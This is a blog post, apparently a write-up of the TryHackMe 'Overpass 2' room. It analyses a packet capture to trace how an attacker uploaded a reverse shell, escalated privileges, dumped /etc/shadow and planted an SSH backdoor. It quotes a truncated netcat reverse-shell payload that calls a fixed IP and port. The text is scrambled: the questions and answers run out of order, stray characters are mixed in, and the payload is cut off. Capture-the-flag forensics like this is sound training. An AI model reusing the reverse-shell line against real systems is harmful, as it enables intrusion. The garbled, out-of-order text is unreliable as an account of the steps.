![]() ![]() In the same stream, the attacker dumped the content of the /etc/shadow file just before downloading the SSH backdoor. Still in the same stream, scrolling down reveals that the attacker has downloaded an ssh backdoor to establish persistence.ġ.5 Using the fasttrack wordlist, how many of the system passwords were crackable? We look at the TCP Stream and we have james’ password.ġ.4 How did the attacker establish persistence? Now, requests that contain passwords from this search will appear marked. After that, we set the string and searching for requests containing passwords. Right-click on the HTTP frame and select “Follow > TCP Stream”.Īnswer : &1|nc 192.168.170.145 4242 >/tmp/f")?>ġ.3 What password did the attacker use to privesc? Now, we are trying to find the reverse shell that the attacker has uploaded to the system. Here is the first request.ġ.2 What payload did the attacker use to gain access? Right-click on the first http frame and select “Follow > TCP Stream”. Open the overpass2.pcapng file in Wireshark and analyze the HTTP traffic (enter http as filter). Md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dcġ.1 What was the URL of the page they used to upload a reverse shell? I recommend learning basic Wireshark and completing Linux Fundamentals as a bare minimum. Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.Ĭan you work out how the attacker got in, and hack your way back into Overpass’ production server? It involved analyzing a capture file containing requests issued by an attacker to compromise the web server, escalate privileges to root and establish persistence, in order to understand the exact steps followed to do so, and then using that information to hack back into the host. This was an easy Linux machine and the second in the Overpass TryHackMe series. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |